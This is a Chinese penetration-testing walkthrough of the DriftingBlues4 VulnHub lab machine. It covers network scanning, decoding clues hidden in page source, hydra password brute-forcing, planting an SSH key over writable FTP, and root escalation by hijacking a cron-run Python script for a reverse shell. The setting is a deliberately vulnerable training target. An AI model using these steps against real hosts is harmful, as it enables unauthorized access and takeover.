靶机渗透练习04-driftingblues4
靶机地址: https://www.vulnhub.com/entry/driftingblues-4,661
1、主机探活
arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号)
netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段)
nmap -sn 192.168.111.0/24
2、端口扫描
nmap -sS -A -sV -T4 -p- 192.168.111.15
21—ftp—ProFTPD
22—ssh—OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80—http—Apache httpd 2.4.38 ((Debian))
3、80端口分析
打开一看啥也没有,直接查看源代码,出现一串base64
Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09解码得到:
go back intruder!!! dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ==再解码:
tight security drippin aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=再解码:
i hope you're an employee L2ltZnVja2luZ21hZC50eHQ=再解码......
/imfuckingmad.txt
访问后出现一堆奇怪的字符,应该是某种编码,放入在线网站探测一波
http://www.dcode.fr/cipher-identifier发现是 Brainfuck 解密,然后进行解密
得到一张图片: /iTiS3Cr3TbiTCh.png
保存到本地用QR进行分析,或者直接使用在线二维码识别网站也行
得到一个url,访问看看(发现无法访问,那应该是需要科学上网了)
4、获得一些用户名,存为user.txt,将其做成字典用于21、22端口的爆破
luther
gary
Hubert
clark
密码字典使用kali自带的rockyou.txt文件
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.111.15 ftp
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.111.15 sshssh爆破失败,ftp成功爆破出一个账号密码:luther/mypics
5、登录ftp进行信息探测
ftp 192.168.111.15
发现hubert家目录具有777权限,所以我们的思路是在用户hubert的目录下写入私钥,来进行免密登录
6、我们在家目录创建.ssh目录,然后直接将kali的公钥重命名为authorized_keys,并把authorized_keys上传到该目录下
ftp 192.168.9.26
输入账户:luther
输入密码:mypics
cd hubert
mkdir .ssh
cd .ssh
put authorized_keysssh hubert@192.168.111.15
7、提权
本地目录下还有一个py文件,属主为root,内容是执行一个系统命令:为向/tmp/backdoor_testing文件中增加1
思路:如果它是个定时任务的话我们就可以修改emergenc.py文件,内容为反弹shell,然后当以root身份运行这个定时任务的时候我们就可以获得root权限的shell
那么如何判断它是否是个定时任务呢,这里推荐使用一个文件 pspy64,可以对进程文件进行监控
下载pspy64:wget http://192.168.111.7/pspy64
chmod +x pspy64
./pspy64
发现该python文件一分钟执行一次,所以是定时任务,执行我们的思路获得root权限
尝试将1.py覆盖掉原来的emergency.py,发现不行,权限不够,
但是用nano进行修改文件,并且保存为emergency.pyM,然后再尝试进行覆盖,发现覆盖成功,然后攻击机监听1234端口
等待反弹即可获得root shell
思路二:命令劫持提权
在 shell 中寻找 suid 程序: find / -perm -u=s -type f 2>/dev/null发现一个不常见的程序 /usr/bin/getinfo
和driftingblues3靶机操作一模一样,参考之前的文章操作也可以获得root权限
完结散花~
参考:https://www.sec-in.com/article/1401
https://www.freebuf.com/articles/others-articles/278323.html
靶机渗透练习04-driftingblues4相关推荐
- dc-3 靶机渗透学习
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误. vim /etc/network/interfacers 改成 vim /etc/ne ...
- DC-3靶机 渗透测试
DC-3 查看靶机mac地址 获取IP地址 Nmap JooScan sqlmap john 上传Webshell nc反弹 提权 DC-3只有一个目标获得root权限,拿到flag. 查看靶机mac ...
- HackInOS靶机渗透writeup
HackInOS靶机渗透writeup 0x00准备测试环境 导入下载好的HackInOS.ova文件后,将网络设置成桥接模式,并使用DHCP分配IP. 成功后打开的靶机图如下 0x01渗透过程 使用 ...
- DC-3靶机渗透测试
DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这 ...
- HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- [HTB]“Heist”靶机渗透详细思路
今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...
- [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
- 【渗透测试】靶机渗透Vulnhub-bulldog
目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...
- 靶机渗透【bulldog】
文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...
最新文章
- 华为存储S58000T-硬盘更换
- java string 反序列化_如何将java.lang.String的空白JSON字符串值反序列化为null?
- Django model、view拆分,添加service
- 头像和Karma汽车
- LeetCode 158. 用 Read4 读取 N 个字符 II
- twisted mysql_Twisted MySQL adbapi返回字典
- angular 字符串转换成数字_Python基础语法大全:字符串的处理与使用
- php转化IP为整形
- sql 允许远程登录
- python客户端服务器_Python客户端和服务器ch
- hdu 1061 Rightmost Digit解题报告
- python实现简单的socket通信
- 深度图像RGB-D(RGB+Depth Map)名词扫盲笔记
- 俄罗斯方块c语言代码 vc 6.0,VC++6.0俄罗斯方块代码
- vue下载本地静态文件
- Java Web Spring框架学习(一)
- HTML网页设计:二、表单、表格
- Apche Kafka 的生与死 – failover 机制详解
- 智能营销增益(Uplift Modeling)模型——pylift库的使用(二)
- 4个角度教你选小程序开发工具?
热门文章
- 怎么用计算机弹出soldout,《SOLDOUT2》游戏怎么玩 游戏攻略玩法全面介绍
- 一步步用python制作游戏外挂【转】
- Linux常用命令:scp命令
- Qt 常用文件对话框及消息对话框使用
- 计算机能力参考范文,信息技术能力论文,关于关于中学计算机教学的若干相关参考文献资料-免费论文范文...
- echarts 直方图加正态_直方图和正态分布图(只需填入待分析数据_自动分析_自动生成图)...
- ABB控制器800模块AC800F/PM802F
- 【洞幺邦】基于python的咖啡店的销售额
- 保研之路——北邮网研院交换中心夏令营
- 怎样把mp3转换成mp4?